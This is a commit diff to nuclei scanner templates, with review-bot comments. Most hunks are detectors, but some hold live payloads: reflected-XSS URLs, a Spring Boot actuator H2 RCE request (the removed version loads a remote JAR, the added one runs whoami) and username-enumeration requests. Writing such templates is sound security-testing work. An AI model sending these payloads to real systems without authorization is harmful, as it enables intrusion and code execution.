Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into token-spray-fix

patch-1
sandeep 2021-11-03 15:43:53 +05:30
commit 0f99f285d3
25 changed files with 456 additions and 53 deletions


@ -0,0 +1,21 @@
---
name: False Negative
about: 'Issue for template missing valid/expected result.'
labels: 'false-negative'
---
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Nuclei Version:
<!-- You can find current version of nuclei with "nuclei -version" -->
### Template file:
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
### Command to reproduce:
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->


@ -1,6 +1,6 @@
---
name: False Positive
about: 'Issue for template producing false positive results.'
about: 'Issue for template producing invalid/unexpected result.'
labels: 'false-positive'
---


@ -1,15 +1,16 @@
id: CVE-2016-6210
info:
name: OpenSSH 5.3 Detection
author: iamthefrogy
name: OpenSSH username enumeration < v7.3
author: iamthefrogy,forgedhallpass
severity: medium
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities.
description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://security-tracker.debian.org/tracker/CVE-2016-6210
- http://openwall.com/lists/oss-security/2016/08/01/2
- https://nvd.nist.gov/vuln/detail/CVE-2016-6210
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
@ -21,6 +22,11 @@ network:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-2.0-OpenSSH_5.3"
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-2][^\d][^\r]+)'
extractors:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_[^\r]+'
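Review bot: The new matcher regex `(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-2][^\d][^\r]+)` requires at least one more character after the non-digit that follows the version, so a banner that ends right after the minor version with a bare `\n` and no `\r` (e.g. `SSH-2.0-OpenSSH_7.2` as the last bytes of the response) is not matched, if that is how the server terminates it; `7\.[0-2](?:[^\d][^\r]*|$)` (and the same shape on the `[1-6]` branch) keeps the digit boundary without demanding trailing text. The CVE-2018-15473 matcher below uses the same construction and has the same edge. Both templates decide purely from the version banner, so distribution builds that backport the fix but keep the upstream version string will also be reported; the description should say so, e.g. `description: ... Detection is banner-based; distributions that backport the fix while keeping the upstream version string will also match.`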


@ -1,8 +1,8 @@
id: CVE-2018-15473
info:
name: OpenSSH Username Enumeration
author: r3dg33k,daffainfo
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
@ -21,9 +21,9 @@ network:
matchers:
- type: regex
regex:
- 'SSH-2.0-OpenSSH_[1-7]'
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
extractors:
- type: regex
regex:
- 'SSH-2.0-OpenSSH_([0-9.]+)'
- '(?i)SSH-2.0-OpenSSH_[^\r]+'


@ -0,0 +1,36 @@
id: CVE-2018-18570
info:
name: Cross-Site Scripting on Planon web application
author: emadshanab
severity: medium
description: Planon before Live Build 41 has XSS
reference:
- https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-18570
tags: xss,cve,cve2018,planon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-18570
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
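Review bot: `cvss-score: 6.10` is read by YAML as the float 6.1, so the trailing zero is cosmetic and any YAML-aware reformatter will rewrite it; write `cvss-score: 6.1`, matching how the other templates on this page record scores (`cvss-score: 5.9`). The ClinicCases template below has the same `6.10`. This template also places `part: body` after `words:` while the ClinicCases template puts `part` first; new templates should settle on one ordering so matcher blocks read the same way across the repository.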


@ -0,0 +1,39 @@
id: CVE-2021-38704
info:
name: ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS)
author: alph4byt3
severity: medium
description: Multiple reflected cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
reference:
- https://github.com/sudonoodle/CVE-2021-38704
- https://nvd.nist.gov/vuln/detail/CVE-2021-38704
metadata:
shodan-query: http.title:"ClinicCases",html:"/cliniccases/"
tags: xss,cve,cve2021,cliniccases
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-38704
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

file/keys/branch-key.yaml Normal file

@ -0,0 +1,17 @@
id: branch-key
info:
name: Branch.io Live Key
author: 0xh7ml
severity: info
reference: https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74
tags: token,file
file:
- extensions:
- all
extractors:
- type: regex
regex:
- "key_live_.{32}"
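Review bot: `key_live_.{32}` accepts any 32 characters after the prefix, including spaces, quotes and closing brackets, so a short placeholder such as `key_live_xxx` followed by surrounding markup still yields a match, and a longer string matches on its first 32 characters only. If Branch live keys are alphanumeric, as the linked issue suggests, `\bkey_live_[a-zA-Z0-9]{32}\b` removes that noise and stops partial matches. The matching `key_test_` form of the same credential is not covered; decide whether it should be, and add a one-line `description` saying what the extractor reports.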


@ -0,0 +1,33 @@
id: django-framework-exceptions
info:
name: Django Framework Exceptions
description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
author: geeknik
reference:
- https://docs.djangoproject.com/en/1.11/ref/exceptions/
- https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
severity: medium
tags: file,logs,django
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'SuspiciousOperation'
- 'DisallowedHost'
- 'DisallowedModelAdminLookup'
- 'DisallowedModelAdminToField'
- 'DisallowedRedirect'
- 'InvalidSessionKey'
- 'RequestDataTooBig'
- 'SuspiciousFileOperation'
- 'SuspiciousMultipartForm'
- 'SuspiciousSession'
- 'TooManyFieldsSent'
- 'PermissionDenied'
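Review bot: Every pattern is a bare class name (`DisallowedHost`, `PermissionDenied`, ...), so the extractor fires on any file that merely mentions these words, including source code, documentation and unrelated frameworks that reuse the names, although the description promises exception detection in logs. Django writes the SuspiciousOperation family to loggers named `django.security.<ExceptionName>` (the second reference on this hunk), so anchoring on that prefix, e.g. `- 'django\.security\.DisallowedHost'`, would keep matches to actual security log lines; confirm against a sample log before converting all entries. `PermissionDenied` is raised by ordinary authorization checks and is not part of that logger family, so it deserves its own `name` or removal.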


@ -0,0 +1,23 @@
id: python-app-sql-exceptions
info:
name: Python App SQL Exception Check
description: Generic check for SQL exceptions in Python according to PEP 249
reference: https://www.python.org/dev
author: geeknik
severity: medium
tags: file,logs,python,sql
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'DataError'
- 'IntegrityError'
- 'ProgrammingError'
- 'OperationalError'
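Review bot: The description calls this a generic PEP 249 check, but the list covers four of the exception classes the spec defines and omits `InterfaceError`, `DatabaseError`, `InternalError` and `NotSupportedError`; either extend the list or narrow the description to the classes actually matched. The `reference` points at `https://www.python.org/dev` rather than the PEP itself, `https://www.python.org/dev/peps/pep-0249/`. As with the Django template above, bare class names will also match source and documentation files, not only logs.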


@ -0,0 +1,28 @@
id: ruby-on-rails-framework-exceptions
info:
name: Ruby on Rails Framework Exceptions
description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
author: geeknik
reference:
- http://edgeguides.rubyonrails.org/security.html
- http://guides.rubyonrails.org/action_controller_overview.html
- https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception
- https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
severity: medium
tags: file,logs,ruby,rails
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'ActionController\:\:InvalidAuthenticityToken'
- 'ActionController::InvalidCrossOriginRequest'
- 'ActionController::MethodNotAllowed'
- 'ActionController::BadRequest'
- 'ActionController::ParameterMissing'


@ -0,0 +1,27 @@
id: spring-framework-exceptions
info:
name: Spring Framework Exceptions
description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts
author: geeknik
reference:
- https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html
severity: medium
tags: file,logs,spring
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'AccessDeniedException'
- 'CsrfException'
- 'InvalidCsrfTokenException'
- 'MissingCsrfTokenException'
- 'CookieTheftException'
- 'InvalidCookieException'
- 'RequestRejectedException'
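Review bot: `AccessDeniedException` is a name shared with `java.nio.file.AccessDeniedException` and other libraries, so this extractor will attribute any Java file-permission error to Spring Security; `RequestRejectedException` is likewise a common name. Qualifying the patterns with the package shown on the referenced overview page, e.g. `- 'org\.springframework\.security\.access\.AccessDeniedException'`, ties the match to the Spring class. If the logs may contain only the simple class name, keep both forms with the qualified one first so the precise match is reported when available.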


@ -0,0 +1,38 @@
id: suspicious-sql-error-messages
info:
name: Suspicious SQL Error Messages
description: Detects SQL error messages that indicate probing for an injection attack
author: geeknik
severity: high
tags: file,logs,sql
file:
- extensions:
- all
extractors:
- type: regex
name: oracle
part: body
regex:
- 'quoted string not properly terminated'
- type: regex
name: mysql
part: body
regex:
- 'You have an error in your SQL syntax'
- type: regex
name: sql_server
part: body
regex:
- 'Unclosed quotation mark'
- type: regex
name: sqlite
part: body
regex:
- 'near \"\*\"\: syntax error'
- 'SELECTs to the left and right of UNION do not have the same number of result columns'
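Review bot: The sqlite pattern `near \"\*\"\: syntax error` escapes the asterisk, so it matches only the literal message `near "*": syntax error`; SQLite puts the offending token inside the quotes (`near "x": syntax error`), so the intent was almost certainly a wildcard, `- 'near \"[^\"]+\": syntax error'`. The patterns are single-quoted YAML, so the backslashes reach the regex engine unchanged; the `\:` is harmless in RE2 but unnecessary and should go along with the fix.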


@ -21,11 +21,13 @@ requests:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/dns-message"
part: header
- type: regex
part: header
regex:
- "(C|c)ontent-(L|l)ength: 49"
part: header
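Review bot: The regex `(C|c)ontent-(L|l)ength: 49` handles only two capitalizations of the header name and exactly one space after the colon; `(?i)content-length:\s*49` covers `CONTENT-LENGTH` and the other casing and spacing that servers and proxies emit, and reads more clearly than the alternations. Keying on an exact 49-byte body is brittle across DoH implementations, but that is pre-existing and not part of this reorder.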


@ -1,11 +1,11 @@
id: gitlab-user-open-api
id: gitlab-api-user-enum
info:
author: Suman_Kar
name: GitLab - User Information Disclosure Via Open API
severity: medium
tags: gitlab,disclosure
reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158
tags: gitlab,enum,misconfig
requests:
- raw:
@ -15,19 +15,19 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
threads: 50
payloads:
uid: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
condition: and
regex:
- "username.*"
- "id.*"
- "name.*"
condition: and
- type: word
part: header
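Review bot: The body regexes `username.*`, `id.*` and `name.*` are satisfied by almost any text (`name.*` already matches `username`, `id.*` matches `invalid` or `void`), so under `condition: and` they add little beyond "the body is non-empty" and any JSON error page with those substrings will count as a hit. Anchoring on the JSON keys the user endpoint returns, e.g. `- '"username":'`, `- '"id":'`, `- '"name":'`, would make the match specific. The header matcher that follows starts inside the hunk and continues outside it.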


@ -1,10 +1,10 @@
id: gitlab-user-enumeration
id: gitlab-graphql-user-enum
info:
name: Gitlab User enumeration
name: Gitlab User enumeration via Graphql API
author: pikpikcu
severity: info
tags: gitlab,enumeration
tags: gitlab,enum,misconfig
requests:
- method: POST
@ -21,16 +21,16 @@ requests:
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
part: header
- type: word
condition: and
words:
- avatarUrl
- username
- email
condition: and
- type: status
status:
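Review bot: `name: Gitlab User enumeration via Graphql API` is inconsistent with the product spelling used by the sibling templates on this page (`GitLab`) and with the API's own name (`GraphQL`); `name: GitLab User Enumeration via GraphQL API` matches both. The status matcher at the end starts inside the hunk and continues outside it.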


@ -4,7 +4,7 @@ info:
name: GitLab public repositories
author: ldionmarcil
severity: info
tags: gitlab
tags: gitlab,exposure,misconfig
reference:
- https://twitter.com/ldionmarcil/status/1370052344562470922
- https://github.com/ldionmarcil/gitlab-unauth-parser


@ -1,9 +1,10 @@
id: gitlab-public-signup
info:
name: GitLab public signup
author: pdteam
severity: info
tags: gitlab
tags: gitlab,misconfig
requests:
- method: GET
@ -26,6 +27,6 @@ requests:
- 200
- type: word
negative: true
words:
- '<meta content="GitLab.com" property="og:description">'
negative: true
- '<meta content="GitLab.com" property="og:description">'


@ -1,9 +1,10 @@
id: gitlab-public-snippets
info:
name: GitLab public snippets
author: pdteam
severity: info
tags: gitlab
tags: gitlab,exposure,misconfig
reference:
- https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
- https://twitter.com/intigriti/status/1375078783338876929
@ -23,10 +24,10 @@ requests:
- type: status
status:
- 200
- type: word
negative: true
condition: or
words:
- "No snippets found"
- "Nothing here."
negative: true
part: body


@ -1,14 +1,13 @@
id: gitlab-user-enumeration
id: gitlab-user-enum
info:
author: Suman_Kar
name: GitLab - User Enumeration
severity: info
tags: gitlab,enumeration
reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
tags: gitlab,enum,misconfig
requests:
- raw:
- |
GET /users/{{user}}/exists HTTP/1.1
@ -16,10 +15,10 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
threads: 50
payloads:
user: helpers/wordlists/user-list.txt
stop-at-first-match: true
matchers-condition: and
matchers:
@ -33,6 +32,6 @@ requests:
- 200
- type: word
part: header
words:
- "application/json"
part: header
- "application/json"


@ -0,0 +1,29 @@
id: default-apache-test-all
info:
name: Apache HTTP Server Test Page
author: andydoering
description: Detects default installations of apache (not just apache2 or installations on CentOS)
severity: info
tags: tech,apache
metadata:
shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: regex # type of the extractor
part: body # part of the response (header,body,all)
condition: or
regex:
- "<title>.*?Apache(|\\d+) .*?(Default|Test).*?</title>"
- "<title>(Default|Test).*? Apache(|\\d+).*?</title>"
extractors:
- type: kval
part: header
kval:
- server
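Review bot: The inline comments `# type of the extractor` and `# part of the response (header,body,all)` sit on a matcher, not an extractor, and read as carried over from a tutorial; replace them with a comment that describes this template, e.g. `# either title form identifies a default Apache test page`, or drop them. The `shodan-query` value concatenates three separate title filters with commas; whether Shodan treats that as one query is worth checking, since the metadata is meant to be pasted as-is.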


@ -0,0 +1,22 @@
id: default-detect-generic
info:
name: Default Web Application Detection
author: andydoering
description: Catch-all for detecting default installations of web applications using common phrases found in default install pages
severity: info
tags: tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
condition: or
words:
- "<title>Default</title>"
- "<title>Welcome to</title>"
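Review bot: The two words require the whole title to equal the phrase, so `<title>Welcome to</title>` will not match `<title>Welcome to nginx!</title>`, which is exactly the default page the description says this catch-all targets. Switch to a regex matcher such as `- '<title>\s*Welcome to\b'` and `- '<title>\s*Default\s*</title>'`, or at least use the opening `<title>Welcome to` as the word so a product name may follow. This template closes the default-application workflow added in this commit, so its breadth decides how much that workflow reports.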


@ -0,0 +1,28 @@
id: api-iconfinder
info:
name: IconFinder API Test
author: daffainfo
severity: info
reference:
- https://developer.iconfinder.com/reference/overview-1
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md
tags: token-spray,iconfinder
self-contained: true
requests:
- raw:
- |
GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1
Host: api.iconfinder.com
Accept: application/json
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"icons":'
- '"is_icon_glyph":'
- '"download_url":'
condition: and
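Review bot: Neither new token-spray template (this one and the Micro User Service one below) carries a `description`, so nothing states which endpoint is called to validate a supplied `{{token}}` or what a match means; add e.g. `description: Validates an IconFinder API token by calling the icon search endpoint with it as a bearer token.` Because `self-contained: true` sends the request straight to `api.iconfinder.com`, the description should also make clear that the target is the vendor API, not the scanned host.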


@ -0,0 +1,34 @@
id: api-micro-user-service
info:
name: Micro User Service API Test
author: daffainfo
severity: info
reference:
- https://m3o.com/user
- https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md
tags: token-spray,micro-user-service
self-contained: true
requests:
- raw:
- |
POST https://api.m3o.com/v1/user/Read HTTP/1.1
Host: api.m3o.com
Content-Type: application/json
Authorization: Bearer {{token}}
Content-Length: 21
{
"id": "usrid-1"
}
matchers:
- type: word
part: body
words:
- '"username":'
- '"email":'
- '"created":'
- '"updated":'
condition: and
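Review bot: The hard-coded `Content-Length: 21` has to equal the byte length of the JSON body that follows, and that length depends on the body's indentation, which this rendered view does not preserve; a later reflow of the body silently breaks the request. If nuclei computes the length for raw requests that are not marked `unsafe`, dropping the header is the safer choice; otherwise a comment such as `# Content-Length must match the JSON body below byte for byte` is the minimum. The check also depends on a user `usrid-1` existing in the account, so a valid token for an account without that user will not match; that belongs in a `description`.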


@ -5,36 +5,33 @@ info:
author: dwisiswant0
severity: critical
tags: springboot,rce
# Payload taken from @pyn3rd (Twitter), see reference[2].
reference:
- https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
- https://twitter.com/pyn3rd/status/1305151887964946432
- https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
- https://github.com/spaceraccoon/spring-boot-actuator-h2-rce
metadata:
shodan-query: http.favicon.hash:116323821
requests:
- method: POST
path:
- "{{BaseURL}}/actuator/env"
headers:
Content-Type: "application/json"
body: |
{
"name": "spring.datasource.hikari.connection-init-sql",
"value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()"
}
- raw:
- |
POST /actuator/env HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"name":"spring.datasource.hikari.connection-test-query",
"value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"spring.datasource.hikari.connection-init-sql\":\""
condition: and
part: body
- type: word
words:
- "application/vnd.spring-boot.actuator"
part: header
- '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT'
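Review bot: The rewritten request changes the running application's configuration — it stores a Hikari `connection-test-query` through `/actuator/env` that the pool runs whenever it tests a connection — while the new matcher only confirms that the env endpoint echoed the property back (`'"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT'`), not that H2 executed anything, so any application with a writable env endpoint is reported as critical RCE regardless of its database. State the side effect in the template, e.g. `description: ... The request persists a connection-test-query in the target's environment until restart; run only with authorization.`, and give the word matcher an explicit `part: body`. It is not clear from this rendering whether the `application/vnd.spring-boot.actuator` header matcher survives the change; if it was dropped, restoring it keeps the actuator fingerprint inside the `and` condition.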


@ -0,0 +1,22 @@
id: default-application-workflow
info:
name: Default Web Application Detection
author: andydoering
description: Detects default installations of web applications
workflows:
- template: technologies/apache/default-apache-test-all.yaml
- template: technologies/apache/xampp-default-page.yaml
- template: technologies/microsoft/default-iis7-page.yaml
- template: technologies/microsoft/default-windows-server-page.yaml
- template: technologies/microsoft/default-microsoft-azure-page.yaml
- template: technologies/default-asp-net-page.yaml
- template: technologies/nginx/default-nginx-page.yaml
- template: technologies/lighttpd-default.yaml
- template: technologies/default-django-page.yaml
- template: exposures/files/drupal-install.yaml
- template: technologies/oracle/default-oracle-application-page.yaml
- template: technologies/ibm/ibm-http-server.yaml
- template: technologies/lighttpd-default.yaml
- template: technologies/default-detect-generic.yaml
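Review bot: `technologies/lighttpd-default.yaml` is listed twice in the workflow, so that template runs twice per target; drop the second entry. The `info` block has no `severity` or `tags`, which every other template on this page carries and which `-tags` filtering relies on; `severity: info` and `tags: tech,default` would match the member templates. Of the referenced paths only `default-apache-test-all.yaml` and `default-detect-generic.yaml` are added in this commit; the rest cannot be verified from this view and should be checked to exist.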